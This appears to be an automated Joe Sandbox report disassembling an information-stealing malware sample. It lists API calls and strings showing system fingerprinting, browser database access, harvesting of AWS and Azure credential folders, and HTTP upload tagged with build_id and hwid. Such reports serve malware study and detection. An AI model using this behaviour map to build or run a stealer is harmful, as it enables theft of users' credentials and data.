                                                                                                          • Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D
                                                                                                          • Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                          • Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                          • Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                          • Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                          • Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
                                                                                                          • Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB
                                                                                                          • Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                                                          • Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC
                                                                                                          • Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                          • Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                          • Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                          • Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A
                                                                                                          • Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9
                                                                                                          • Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                          • Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                          • Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                          • Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                          • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                          • Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                          • Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
                                                                                                          • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                          • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                          • Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                          • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                        • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                        • API String ID: 681701770-1014693891
                                                                                                        • Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                        • Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
                                                                                                        • Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                                        • Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98
                                                                                                        Function 004169B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249sleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                          • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                          • Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                          • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                          • Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
                                                                                                        • Sleep.KERNEL32(0000EA60), ref: 00416BFF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcpy$Sleep
                                                                                                        • String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                        • API String ID: 2840494320-4129404369
                                                                                                        • Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                        • Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
                                                                                                        • Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                                        • Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98
                                                                                                        Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230stringmemoryfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,00437198,004367C6,?,?,?), ref: 004085D3
                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
                                                                                                        • lstrlenA.KERNEL32(?), ref: 004086CB
                                                                                                        • lstrcatA.KERNEL32(?), ref: 004086E4
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 004086EE
                                                                                                        • lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00408704
                                                                                                        • lstrcatA.KERNEL32(?,004371A0), ref: 00408710
                                                                                                        • lstrcatA.KERNEL32(?), ref: 0040871D
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00408727
                                                                                                        • lstrcatA.KERNEL32(?,004371A4), ref: 00408733
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00408740
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0040874A
                                                                                                        • lstrcatA.KERNEL32(?,004371A8), ref: 00408756
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00408763
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0040876D
                                                                                                        • lstrcatA.KERNEL32(?,004371AC), ref: 00408779
                                                                                                        • lstrcatA.KERNEL32(?,004371B0), ref: 00408785
                                                                                                        • lstrlenA.KERNEL32(?), ref: 004087BE
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040880B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                        • String ID: passwords.txt
                                                                                                        • API String ID: 1956182324-347816968
                                                                                                        • Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                        • Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
                                                                                                        • Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                                        • Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59
                                                                                                        Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378networkstringfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2263 404b2e-404bf3 call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 2278 404bf5 2263->2278 2279 404bfb-404c01 2263->2279 2278->2279 2280 405194-405236 InternetCloseHandle call 402920 * 8 call 41d016 2279->2280 2281 404c07-404d91 call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 2279->2281 2281->2280 2350 404d97-404dd1 HttpOpenRequestA 2281->2350 2351 404dd7-404ddd 2350->2351 2352 405188-40518e InternetCloseHandle 2350->2352 2353 404dfb-40511a call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 4104e7 call 4105c7 * 2 call 41058d call 402920 * 2 lstrlenA * 2 HttpSendRequestA 2351->2353 2354 404ddf-404df5 InternetSetOptionA 2351->2354 2352->2280 2457 40515c-405174 InternetReadFile 2353->2457 2354->2353 2458 405176-405183 InternetCloseHandle call 402920 2457->2458 2459 40511c-405124 2457->2459 2458->2352 2459->2458 2460 405126-405157 call 410609 call 41058d call 402920 2459->2460 2460->2457
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        • lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                        • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                        • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                        • String ID: "$"$------$------$------$8wA$build_id$hwid
                                                                                                        • API String ID: 3006978581-858375883
                                                                                                        • Opcode ID: b105060c4e4bbf32865d800b87946fda209dabeebbd94f0e8d26b4a58616715d
                                                                                                        • Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
                                                                                                        • Opcode Fuzzy Hash: b105060c4e4bbf32865d800b87946fda209dabeebbd94f0e8d26b4a58616715d
                                                                                                        • Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8
                                                                                                        Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2467 401666-40169e GetTempPathW 2468 4016a4-4016cb wsprintfW 2467->2468 2469 401809-40180b 2467->2469 2470 4016d0-4016f5 CreateFileW 2468->2470 2471 4017fa-401808 call 41d016 2469->2471 2470->2469 2473 4016fb-40174e GetProcessHeap RtlAllocateHeap _time64 srand rand call 423c10 WriteFile 2470->2473 2473->2469 2477 401754-40175a 2473->2477 2477->2469 2478 401760-40179c call 423c10 CloseHandle CreateFileW 2477->2478 2478->2469 2481 40179e-4017b1 ReadFile 2478->2481 2481->2469 2482 4017b3-4017b9 2481->2482 2482->2469 2483 4017bb-4017f1 call 423c10 GetProcessHeap RtlFreeHeap CloseHandle 2482->2483 2483->2470 2486 4017f7-4017f9 2483->2486 2486->2471
                                                                                                        APIs
                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00401696
                                                                                                        • wsprintfW.USER32 ref: 004016BC
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
                                                                                                        • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00401705
                                                                                                        • _time64.MSVCRT ref: 0040170E
                                                                                                        • srand.MSVCRT ref: 00401715
                                                                                                        • rand.MSVCRT ref: 0040171E
                                                                                                        • _memset.LIBCMT ref: 0040172E
                                                                                                        • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
                                                                                                        • _memset.LIBCMT ref: 00401763
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00401771
                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
                                                                                                        • _memset.LIBCMT ref: 004017BE
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
                                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 004017CF
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004017DB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                        • String ID: %s%s$delays.tmp
                                                                                                        • API String ID: 1620473967-1413376734
                                                                                                        • Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                        • Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
                                                                                                        • Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
                                                                                                        • Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28
                                                                                                        Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 004164E2
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
                                                                                                        • lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                          • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                          • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                          • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                          • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                          • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                        • _memset.LIBCMT ref: 00416556
                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00416578
                                                                                                        • lstrcatA.KERNEL32(?,\.aws\), ref: 00416595
